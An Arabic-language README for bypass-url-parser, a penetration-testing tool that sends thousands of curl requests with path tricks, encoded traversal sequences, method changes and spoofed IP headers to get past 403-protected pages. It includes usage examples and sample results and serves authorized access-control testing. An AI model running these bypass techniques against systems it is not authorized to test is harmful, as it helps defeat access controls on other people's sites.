
يختبر مئات تقنيات تجاوز عناوين URL ضد الصفحات المحمية بـ 40X باستخدام طلبات curl الخام، مع مسح متعدد الأنماط، وانتحال الرؤوس، وتصدير النتائج بتنسيق JSON/HTML لتقييم التحكم في الوصول.
أداة تختبر MANY تجاوزات الروابط للوصول إلى صفحة محمية برمز 40X.
إذا كنت تتساءل لماذا هذا الكود هو مجرد غلاف ملتوي لـ curl، فإليك السبب:
هذا صعب بشكل مدهش تحقيقه في python دون خسارة كل مزايا المكتبة مثل تحليل (parsing)، تغليف ssl/tls وما إلى ذلك.
لذا، كن مثلي، استخدم curl كخلفية، سيكون الأمر على ما يرام.
أيضًا، يمكن استخدام هذه الأداة كمكتبة، انظر lib_sample_usage.py
نوصي باستخدام pipx لتثبيت هذه الأداة:```bash
pipx install bypass-url-parser
pipx install git+https://github.com/laluka/bypass-url-parser
بدلاً من ذلك، يمكنك استخدام `pip`:```bash
pip install bypass-url-parser
Bypass Url Parser, made with love by @TheLaluka A tool that tests MANY url bypasses to reach a 40X protected page.
Usage: bypass-url-parser (-u | -R ) [-m ] [-o ] [-S ] [ (-H
)...] [-r ] [-s ] [--spoofip-replace] [-p ] [--spoofport-replace] [-t ] [-T ] [--request-tls] [--jsonl] [--dump-payloads] [-x <proxy_url>] [-v | -d | -dd]Program options: -u, --url URL (path is optional) to run bypasses against -R, --request Load HTTP raw request from a file -H, --header
Header(s) to use, format: "Cookie: can_i_haz=fire" -m, --mode Bypass modes. See 'Bypasser.BYPASS_MODES' in code [Default: all] -o, --outdir Output directory for results -x, --proxy <proxy_url> Set a proxy in the format http://proxy_ip:port. -S, --save-level Save results level. From 0 (DISABLE) to 3 (FULL) [Default: 2] -s, --spoofip IP(s) to inject in ip-specific headers -p, --spoofport Port(s) to inject in port-specific headers -r, --retry Retry attempts of failed requests. Set 0 to disable all retry tentatives [Default: 1] -t, --threads Scan with N parallel threads [Default: 1] -T, --timeout Request times out after N seconds [Default: 5]General options: -h, --help Show help, you are here :) -v, --verbose Verbose output -d, --debug Show more details like curl commands generated by this tool -dd, --debug Print Debug level 2 (with all classes debug_class output) -V, --version Show version info
Misc options: --spoofip-replace Disable list of default internal IPs in 'http_headers_ip' bypass mode --spoofport-replace Disable list of default internal ports in 'http_headers_port' bypass mode --request-tls Force usage of TLS/HTTPS for the request load with the '-R, --request' option --dump-payloads Print all payloads (curls) generated by this tool. --jsonl Print results in JSON lines format (pipe command output)
Examples: bypass-url-parser -u "http://127.0.0.1/juicy_403_endpoint/" -s 8.8.8.8 -d bypass-url-parser -u /path/urls -t 30 -T 5 -H "Cookie: me_iz=admin" -H "User-agent: test" bypass-url-parser -R /path/request_file --request-tls -m "mid_paths, end_paths"
## النتيجة المتوقعة```bash
bypass-url-parser -u http://127.0.0.1:8000/foo/bar
2022-08-09 14:52:40 lalu-perso bup[361559] WARNING Trying to bypass 'http://127.0.0.1:8000/foo/bar' url (3213 payloads)...
2022-08-09 14:52:40 lalu-perso bup[361559] INFO Doing: 50 / 3213
[...]
2022-08-09 14:52:54 lalu-perso bup[361559] INFO Doing: 3200 / 3213
2022-08-09 14:52:54 lalu-perso bup[361559] INFO Retry (1/3) the '16' failed curl commands with 10 threads and 10s timeout
2022-08-09 14:52:54 lalu-perso bup[361559] INFO Retry (2/3) the '16' failed curl commands with 5 threads and 20s timeout
2022-08-09 14:52:54 lalu-perso bup[361559] INFO Retry (3/3) the '16' failed curl commands with 1 threads and 30s timeout
2022-08-09 14:52:55 lalu-perso bup[361559] INFO
[#####] [bypass_method] [payload] => [status_code] [content_type] [content_length] [lines_count] [word_counts] [title] [server] [redirect_url]
[GROUP (1587)] [original_request] [http://127.0.0.1:8000/foo/bar] => [404] [text/html] [469] [14] [95] [Error response] [SimpleHTTP/0.6 Python/3.8.10] []
[GROUP (10)] [http_methods] [-X CONNECT http://127.0.0.1:8000/foo/bar] => [501] [text/html] [500] [14] [96] [Error response] [SimpleHTTP/0.6 Python/3.8.10] []
[SINGLE] [mid_paths] [http://127.0.0.1:8000/???foo/bar] => [200] [text/html] [913] [26] [27] [Directory listing for /???foo/bar] [SimpleHTTP/0.6 Python/3.8.10] []
[SINGLE] [mid_paths] [http://127.0.0.1:8000//???foo/bar] => [301] [] [] [0] [0] [] [SimpleHTTP/0.6 Python/3.8.10] [/???foo/bar]
[SINGLE] [mid_paths] [http://127.0.0.1:8000/??foo/bar] => [200] [text/html] [911] [26] [27] [Directory listing for /??foo/bar] [SimpleHTTP/0.6 Python/3.8.10] []
[SINGLE] [mid_paths] [http://127.0.0.1:8000//??foo/bar] => [301] [] [] [0] [0] [] [SimpleHTTP/0.6 Python/3.8.10] [/??foo/bar]
[SINGLE] [mid_paths] [http://127.0.0.1:8000/?foo/bar] => [200] [text/html] [909] [26] [27] [Directory listing for /?foo/bar] [SimpleHTTP/0.6 Python/3.8.10] []
[SINGLE] [mid_paths] [http://127.0.0.1:8000//?foo/bar] => [301] [] [] [0] [0] [] [SimpleHTTP/0.6 Python/3.8.10] [/?foo/bar]
[SINGLE] [mid_paths] [http://127.0.0.1:8000///?anythingfoo/bar] => [200] [text/html] [929] [26] [27] [Directory listing for ///?anythingfoo/bar] [SimpleHTTP/0.6 Python/3.8.10] []
[SINGLE] [mid_paths] [http://127.0.0.1:8000////?anythingfoo/bar] => [200] [text/html] [931] [26] [27] [Directory listing for ////?anythingfoo/bar] [SimpleHTTP/0.6 Python/3.8.10] []
[GROUP (2)] [mid_paths] [http://127.0.0.1:8000/#?foo/bar] => [200] [text/html] [893] [26] [27] [Directory listing for /] [SimpleHTTP/0.6 Python/3.8.10] []
[GROUP (2)] [mid_paths] [http://127.0.0.1:8000//#?foo/bar] => [301] [] [] [0] [0] [] [SimpleHTTP/0.6 Python/3.8.10] [/]
sudo apt install -y bat curl virtualenv python3
virtualenv -p python3 .py3 source .py3/bin/activate PDM_BUILD_SCM_VERSION="$(git describe --abbrev=0)-dev" pip install .
python src/bypass_url_parser/init.py -u https://thinkloveshare.com/juicy_403_endpoint/
bypass-url-parser -u https://thinkloveshare.com/juicy_403_endpoint/ cat /tmp/tmpRANDOM-bypass-url-parser/triaged-bypass.json | jq -r '.results[].request_curl_cmd' cat /tmp/tmpRANDOM-bypass-url-parser/triaged-bypass.json | jq -r '.results[].response_data'
### DOCKER```bash
docker run --rm -it -v "$PWD:/host" -w /host ghcr.io/laluka/bypass-url-parser:latest bash -il
# Then bup -h, keep the docker open as the output is saved by default in /tmp
# Or specify the output to the current directory, and consult them later! :)
يسمح Bypass_url_parser بتعريف بعض الوسائط بعدة طرق:
-m, --mode و -s, --spoofip و -p, --spoofport يمكن أن تكون اسم ملف، نص، قائمة نصوص مفصولة بفواصل، أو قائمة (عند استخدام Bypasser كمكتبة)؛-u, --url يمكن أن يكون اسم ملف، نص، أو قائمة (عند استخدام Bypasser كمكتبة)؛stdin (مع -) مدعوم لجميع هذه الوسائط.على سبيل المثال، إذا أردت تعريف عدة روابط مستهدفة (-u, --url)، فإن جميع الأوامر التالية تنتج نفس النتيجة:```bash
bypass-url-parser -u http://thinkloveshare.com/test
bypass-url-parser -u /path/urls
cat /path/urls | bypass-url-parser -u -
echo 'http://thinkloveshare.com/test' | bypass-url-parser -u -
### تعريف الهدف
يجب تعريف هدف لكي تعمل الأداة. خياران:
- `-u, --url`: عنوان URL (عناوين URL)، في GET
- `-R, --request`: ملف الطلب. لا يمكن تخمين البروتوكول من الملف، لذلك `http` افتراضيًا أو `https` إذا كان الخيار `--request-tls` موجودًا.
### وضع الالتفاف
إذا تم تحديد `-m, --mode`، يمكنك تحديد وضع الالتفاف المطلوب لتشغيل اختبار معين (أو اختبارات) وتقليل عدد الطلبات التي ترسلها الأداة.
حاليًا، أوضاع الالتفاف التالية مدعومة:```
all, mid_paths, end_paths, case_substitution, char_encode, http_methods, http_versions, http_headers_method, http_headers_scheme, http_headers_ip, http_headers_port, http_headers_url, user_agent
مثال:```bash bypass-url-parser -u /path/urls -m "case_substitution, char_encode, http_headers_scheme"
### Spoofip / Spoofport
لتخصيص عناوين IP والمنافذ المستخدمة في محاولات التجاوز، تدعم الأداة الخيارات التالية:
- باستخدام `-s, --spoofip` يمكنك تعيين بعض عناوين IP لحقنها في رؤوس `ip-specific` (`X-Forwarded-For`, `X-Real-Ip`, إلخ.)
- باستخدام `-p, --spoofport` يمكنك تعيين بعض المنافذ لحقنها في رؤوس `port-specific` (`X-Forwarded-Port`)
افتراضيًا، تُضاف هذه الإدخالات المخصصة إلى قوائم IP/المنافذ الداخلية. إذا كنت تريد استخدام عناوين IP/المنافذ الخاصة بك فقط، يمكنك استخدام وسيطات `--spoofip-replace` و/أو `--spoofport-replace`.
مثال:```bash
bypass-url-parser -u /path/urls -s /path/custom_ip --spoofip-replace
bypass-url-parser -u /path/urls -p "3000, 9443, 10443"
باستخدام الخيار --jsonl، يمكن طباعة النتائج على stdout بتنسيق JSON-Lines. يتم عرض إخراج الأداة القياسية ونتائجها باستخدام logger على stderr، لذلك من الممكن توجيه تنسيق الإخراج JSON-Line إلى أدوات أخرى:```bash
bypass-url-parser -u "https://thinkloveshare.com/juicy_403_endpoint/" -t 20 -S 0 -m case_substitution,char_encode --jsonl | jq
***ملاحظات:** مع `-S 2` أو `-S 3`، يتضمن إخراج JSON-Lines أيضًا المسار واسم ملفات html المحفوظة.*
### حفظ النتائج
بشكل افتراضي، إذا كان عنوان URL الهدف فريدًا، تقوم الأداة بحفظ نسخة من النتائج في دليل `/tmp/tmpXXX-bypass-url-parser/`.
***ملاحظات:** إذا تم تمرير عناوين URL متعددة إلى `-u`، يتم تسبيق النتائج بالعنوان كدليل (`/tmp/tmpXXX-bypass-url-parser/http-target-com-8080-api-users/`).*
هناك وسيطان لتخصيص هذا السلوك:
- `-o, --outdir` لتعيين دليل إخراج مخصص
- `-S, --save-level` لاختيار مستوى الحفظ
مستويات الحفظ هي:
- `0` (بلا): تعطيل حفظ الإخراج وإنشاء دليل الإخراج؛
- `1` (أدنى): حفظ ملف سجل البرنامج فقط الذي يحتوي على النتائج: `triaged-bypass.log`؛
- `2` (ملائم): حفظ ملف سجل البرنامج `triaged-bypass.log` واستجابات **ذات صلة (نتائج)** في ملف `triaged-bypass.json` وملفات html منفصلة (افتراضي)؛
- `3` (كامل): حفظ ملف سجل البرنامج `triaged-bypass.log` واستجابات **جميع** في ملف `triaged-bypass.json` وملفات html منفصلة.
#### مثال```bash
bypass-url-parser -S 0
bypass-url-parser -S 1 -o /tmp/bypass-res
bypass-url-parser -S 2 -o /tmp/bypass-res2 -H "User-Agent: curl 7.74.0" -u http://thinkloveshare.com/juicy_403_endpoint/
tree /tmp/bypass-res2/
├── bypass-2469eecf6c38b5817d2248e911ad4382.html
├── bypass-6f7cce7caf0a0a4b440859fa189d496d.html
├── bypass-80f4ab5d32b4e74c20630c7e67f2e42f.html
├── bypass-93079abffe63d34f79ac4a511cd6b5e6.html
├── bypass-945822230d58d1ad4680d5dfbc470ecb.html
├── bypass-e6118c315eea0e5b2ebc4fcafe0559c0.html
├── triaged-bypass.json
└── triaged-bypass.log
0 directories, 8 files
بدءًا من مستوى MINIMAL، يتم حفظ النتائج التي يعرضها البرنامج في ملف triaged-bypass.log.
مع مستويات الحفظ PERTINENT وFULL، يقوم البرنامج بالإضافة إلى ذلك بتصدير جميع النتائج في ملف triaged-bypass.json:```json
{
"url": "http://thinkloveshare.com/juicy_403_endpoint/",
"bypass_modes": "all",
"results": [
{
"request_curl_cmd": "/usr/bin/curl -sS -kgi -H 'User-Agent: curl 7.74.0' --path-as-is -H 'X-BlueCoat-Via: localhos[...SNIP...]",
"request_curl_payload": "-H X-BlueCoat-Via: localhost http://thinkloveshare.com/juicy_403_endpoint/",
"response_headers": "HTTP/1.1 301 Moved Permanently\nConnection: keep-alive\nContent-Length: 162\nServer: GitHub.c[...SNIP...]",
"response_data": "\n301 Moved Permanently\n\n
تسهيل التعامل معها باستخدام `jq`:```bash
$ jq -r '.results[] | [.request_curl_payload, .response_status_code, .response_content_type, .response_content_length] | join("|")' /tmp/bypass-res2/triaged-bypass.json
-H X-BlueCoat-Via: localhost http://thinkloveshare.com/juicy_403_endpoint/|301|text/html|162
-X PROPFIND http://thinkloveshare.com/juicy_403_endpoint/|405||131
http://thinkloveshare.com/%3b%2f%2e%2e%2f%2e%2e%2f%2fjuicy_403_endpoint/|400|text/html|9121
-H Host: 8.8.8.8 http://thinkloveshare.com/juicy_403_endpoint/|404|text/html|9115
-X CONNECT http://thinkloveshare.com/juicy_403_endpoint/|400|text/plain|15
http://thinkloveshare.com/juicy_403_endpoint/°//|400|text/html|90
مع مستويات الحفظ PERTINENT و FULL، يتم أيضًا تخزين أوامر curl والاستجابات HTTP الكاملة في ملفات .html زائفة:```bash
$ echo /tmp/bypass-res2/*.html | xargs batcat
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: /tmp/bypass-res2/bypass-2469eecf6c38b5817d2248e911ad4382.html
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ /usr/bin/curl -sS -kgi -H 'User-Agent: curl 7.74.0' --path-as-is 'http://thinkloveshare.com/juicy_403_endpoint/°//'
2 │
3 │ HTTP/1.1 400 Bad request
4 │ Connection: keep-alive
5 │ Content-Length: 90
6 │ Cache-Control: no-cache
7 │ Content-Type: text/html
8 │ Accept-Ranges: bytes
9 │ Date: Tue, 25 Apr 2023 23:51:38 GMT
10 │ Via: 1.1 varnish
11 │ X-Served-By: cache-par-lfpg1960025-PAR
12 │ X-Cache: MISS
13 │ X-Cache-Hits: 0
14 │ X-Timer: S1682466698.230664,VS0,VE10
15 │ Vary: Accept-Encoding
16 │ X-Fastly-Request-ID: b6bbb82302420db4f101a316dca39cc283a4fd44
17 │
18 │
## المساهمون
- الإصدار الأولي بواسطة [@TheLaluka](https://twitter.com/TheLaluka)
- إعادة هيكلة ضخمة ووضع المكتبة مع الشكر لـ [@jtop_fap](https://twitter.com/jtop_fap)
- دعم بناء `Docker` و `Pypi` بفضل عمل [@DugnyG](https://twitter.com/DugnyG)
## الترخيص
حقوق النشر (C) 2022 Laluka
هذا البرنامج هو برمجيات حرة: يمكنك إعادة توزيعه و/أو تعديله بموجب شروط رخصة جنو أفيرو العمومية العامة كما نشرتها مؤسسة البرمجيات الحرة، إما الإصدار 3 من الرخصة، أو (حسب اختيارك) أي إصدار لاحق.
يُوزَّع هذا البرنامج على أمل أن يكون مفيدًا، ولكن دون أي ضمان؛ دون حتى الضمان الضمني للقابلية للتسويق أو الملاءمة لغرض معين. راجع رخصة جنو أفيرو العمومية العامة لمزيد من التفاصيل.
يجب أن تكون قد تلقيت نسخة من رخصة جنو أفيرو العمومية العامة مع هذا البرنامج. إذا لم تكن قد تلقيتها، راجع <https://www.gnu.org/licenses/>.